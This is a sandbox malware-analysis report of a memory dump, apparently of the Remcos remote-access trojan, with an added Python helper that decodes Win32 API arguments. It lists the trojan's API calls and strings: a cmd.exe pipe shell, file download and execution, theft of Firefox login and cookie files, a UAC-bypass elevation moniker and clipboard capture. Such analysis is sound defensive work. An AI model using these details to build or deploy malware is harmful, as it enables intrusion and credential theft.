                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Startup
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                                          • Opcode ID: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                                                                                                                                                          • Instruction ID: 8755cd578eecc9cf916cb98f31ec890f8d4d8ec8e876fe09ba6f20fbb4fb2f80
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 02D0123255C60CCED620ABB4AD0F8A4775CC717616F0403BA6CB5C26D7E6405A2DC2AB
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Deallocatestd::_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1323251999-0
                                                                                                                                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: recv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1507349165-0
                                                                                                                                                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                                                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: send
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2809346765-0
                                                                                                                                                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                                                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
APIs
• VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• __Init_thread_footer.LIBCMT ref: 004056E6
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• __Init_thread_footer.LIBCMT ref: 00405723
• CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
• CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
• PeekNamedPipe.KERNEL32 ref: 004058BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0), ref: 004059E4
• Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
• TerminateProcess.KERNEL32(00000000), ref: 00405A17
• CloseHandle.KERNEL32 ref: 00405A23
• CloseHandle.KERNEL32 ref: 00405A2B
• CloseHandle.KERNEL32 ref: 00405A3D
• CloseHandle.KERNEL32 ref: 00405A45
Strings
Yara matches
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
• API String ID: 2994406822-3565532687
APIs
• SetEvent.KERNEL32(?,?), ref: 00407CF4
• GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
• DeleteFileW.KERNEL32(00000000), ref: 00407DE4
  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C37D
  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C3AD
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C402
  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C463
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C46A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
• GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
• DeleteFileA.KERNEL32(?), ref: 0040868D
  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• Sleep.KERNEL32(000007D0), ref: 00408733
• StrToIntA.SHLWAPI(00000000), ref: 00408775
  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
Strings
Yara matches
Similarity
• API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
• String ID: 8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
• API String ID: 1067849700-718893278
APIs
• GetCurrentProcessId.KERNEL32 ref: 00412141
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
• OpenMutexA.KERNEL32 ref: 00412181
• CloseHandle.KERNEL32(00000000), ref: 00412190
• CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
Strings
Yara matches
Similarity
• API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
• String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$xtv
• API String ID: 3018269243-1141707176
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
• FindClose.KERNEL32(00000000), ref: 0040BC04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
• FindClose.KERNEL32(00000000), ref: 0040BD4D
Strings
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,h}v,?,h]v), ref: 0040F4C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
• CloseHandle.KERNEL32(00000000), ref: 0040F59E
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000), ref: 0040F6A9
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$h]v$h}v$ieinstal.exe$ielowutil.exe$xtv
                                                                                                                                                                          • API String ID: 3756808967-2128172920
                                                                                                                                                                          • Opcode ID: bc99ba9c7543c747694b786fb301b391a6ac372948951d796756b953d2f546da
                                                                                                                                                                          • Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
                                                                                                                                                                          • Opcode Fuzzy Hash: bc99ba9c7543c747694b786fb301b391a6ac372948951d796756b953d2f546da
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
APIs
• OpenClipboard.USER32 ref: 004168FD
• EmptyClipboard.USER32 ref: 0041690B
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
• GlobalLock.KERNEL32(00000000), ref: 00416934
• GlobalUnlock.KERNEL32(00000000), ref: 0041696A
• SetClipboardData.USER32(0000000D,00000000), ref: 00416973
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32 ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID: !D@
• API String ID: 3520204547-604454484
• Opcode ID: 4c962c0f3646bba82b373c2adbd36f85a455112de2522dce5665a4225f6141c5
• Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
• Opcode Fuzzy Hash: 4c962c0f3646bba82b373c2adbd36f85a455112de2522dce5665a4225f6141c5
• Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
• FindClose.KERNEL32(00000000), ref: 0040BE04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
• FindClose.KERNEL32(00000000), ref: 0040BEEA
• FindClose.KERNEL32(00000000), ref: 0040BF0B
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
• Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
• Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
• Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
• Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
• GetFileSize.KERNEL32(?,00000000), ref: 0041346D
• UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
• CloseHandle.KERNEL32(00000000), ref: 0041349A
• CloseHandle.KERNEL32(?), ref: 004134A0
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleView$CreateMappingSizeUnmap
• String ID:
• API String ID: 297527592-0
• Opcode ID: 99f17da9e7d54f956def1805155cc27ac6796c213d0ac5a717a51dbca6d250a6
• Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
• Opcode Fuzzy Hash: 99f17da9e7d54f956def1805155cc27ac6796c213d0ac5a717a51dbca6d250a6
• Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C37D
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C3AD
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C41F
• DeleteFileW.KERNEL32(?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C42C
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C402
• GetLastError.KERNEL32(?,?,?,?,?,xtv,00475300,00000001), ref: 0041C44D
• FindClose.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C463
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C46A
• FindClose.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C473
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID: xtv
• API String ID: 2341273852-1469483009
• Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
• Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
• Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
• Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
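The function blocks above list raw Win32 calls with their arguments as eight-digit hex, which hides the part an analyst actually cares about: which access rights OpenProcess asked for, which clipboard format SetClipboardData wrote, which attribute SetFileAttributesW forced before DeleteFileW. The Python below is an added example, not part of the Joe Sandbox report or of the Remcos sample. It parses lines in the report's "APIs" format, decodes the tabled constant arguments against the documented Win32 values, and tags each block with the capability its call set implies. The sample input is copied from the process-enumeration and clipboard blocks above; the capability labels and the API sets behind them are this example's own choice, not Joe Sandbox's signature taxonomy.

```python
import re

# One 'APIs' line as Joe Sandbox prints it, with or without an argument list, e.g.
# "• OpenProcess.KERNEL32(00001000,00000000,?,...), ref: 0041C286" or "• OpenClipboard.USER32 ref: 004168FD"
API_LINE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"   # OpenProcess.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"                  # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"       # call-site address
)

# Symbolic names for arguments worth decoding, keyed by (API, zero-based argument index).
# Values are the documented Win32 constants; "flags" are OR-combined bitmasks, "enum" single values.
ARG_TABLES = {
    ("CreateToolhelp32Snapshot", 0): ("flags", {0x2: "TH32CS_SNAPPROCESS", 0x8: "TH32CS_SNAPMODULE"}),
    ("OpenProcess", 0): ("flags", {0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                                   0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
                                   0x400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}),
    ("GlobalAlloc", 0): ("flags", {0x2: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT", 0x2000: "GMEM_DDESHARE"}),
    ("SetClipboardData", 0): ("enum", {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}),
    ("CreateFileMappingW", 2): ("flags", {0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE"}),
    ("MapViewOfFile", 1): ("flags", {0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ"}),
    ("SetFileAttributesW", 1): ("flags", {0x1: "FILE_ATTRIBUTE_READONLY", 0x80: "FILE_ATTRIBUTE_NORMAL"}),
}

# Capability labels are this example's own; one is claimed only when every API in its set occurs.
CAPABILITIES = [
    ("enumerates running processes", {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}),
    ("opens handles to other processes", {"OpenProcess"}),
    ("reads the clipboard", {"OpenClipboard", "GetClipboardData"}),
    ("overwrites the clipboard", {"OpenClipboard", "EmptyClipboard", "SetClipboardData"}),
    ("sends data over a socket", {"send"}),
    ("walks a directory tree", {"FindFirstFileW", "FindNextFileW"}),
    ("deletes files and directories", {"DeleteFileW", "RemoveDirectoryW"}),
    ("maps a file into memory", {"CreateFileMappingW", "MapViewOfFile"}),
]


def decode_arg(api, index, raw):
    """Return the symbolic form of one argument, or the raw token if it cannot be decoded."""
    table = ARG_TABLES.get((api, index))
    if table is None or not re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return raw                      # '?' (unresolved by the sandbox) or an API not in the table
    kind, names = table
    value = int(raw, 16)
    if kind == "enum":
        return names.get(value, raw)
    parts = [name for bit, name in sorted(names.items()) if value & bit]
    rest = value & ~sum(bit for bit in names if value & bit)
    if rest:
        parts.append(hex(rest))         # bits the table has no name for
    return "|".join(parts) if parts else raw


def parse_block(text):
    """Parse the 'APIs' lines of one function block into decoded calls and implied capabilities."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue                    # headings, hashes and memory-dump lines carry no call
        api, args = m.group("api"), m.group("args")
        calls.append({"api": api, "module": m.group("module"), "ref": m.group("ref"),
                      "subcall": "Part of subcall" in line,   # reached through a callee
                      "args": [decode_arg(api, i, a) for i, a in enumerate(args.split(",") if args else [])]})
    seen = {c["api"] for c in calls}
    return {"calls": calls, "capabilities": [name for name, need in CAPABILITIES if need <= seen]}


# Sample input: the 'APIs' lines of two function blocks, copied from the report above.
SAMPLE_BLOCKS = {
    "process_enum": """\
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,h}v,?,h]v), ref: 0040F4C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
• CloseHandle.KERNEL32(00000000), ref: 0040F59E
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000), ref: 0040F6A9
""",
    "clipboard": """\
• OpenClipboard.USER32 ref: 004168FD
• EmptyClipboard.USER32 ref: 0041690B
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
• GlobalLock.KERNEL32(00000000), ref: 00416934
• GlobalUnlock.KERNEL32(00000000), ref: 0041696A
• SetClipboardData.USER32(0000000D,00000000), ref: 00416973
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32 ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
""",
}
```

Calling parse_block on the first sample turns CreateToolhelp32Snapshot's 00000002 into TH32CS_SNAPPROCESS and the two OpenProcess calls into PROCESS_QUERY_LIMITED_INFORMATION and PROCESS_QUERY_INFORMATION. That is the check worth making before reading this function as the injector: it requests query-only rights, so on its own it establishes candidate selection (the Internet Explorer file names in its String ID), not a write into the target; the function that performs the injection would request PROCESS_VM_WRITE or PROCESS_CREATE_THREAD. On the clipboard sample the 0000000D becomes CF_UNICODETEXT and GlobalAlloc's 00002000 becomes GMEM_DDESHARE, and the trailing send gives the block the "sends data over a socket" label. Fed the deletion block above, decode_arg resolves SetFileAttributesW's 00000080 to FILE_ATTRIBUTE_NORMAL, the usual way of clearing the read-only bit so the following DeleteFileW succeeds.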
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 0a489d5e0e760ad1c7226f97b7491b422d815e77a9228981358e888a0221c37f
• Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
• Opcode Fuzzy Hash: 0a489d5e0e760ad1c7226f97b7491b422d815e77a9228981358e888a0221c37f
• Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: (kG
• API String ID: 1888522110-2813241365
APIs
• _wcslen.LIBCMT ref: 0040755C
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
• GetLastError.KERNEL32 ref: 0041A84C
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
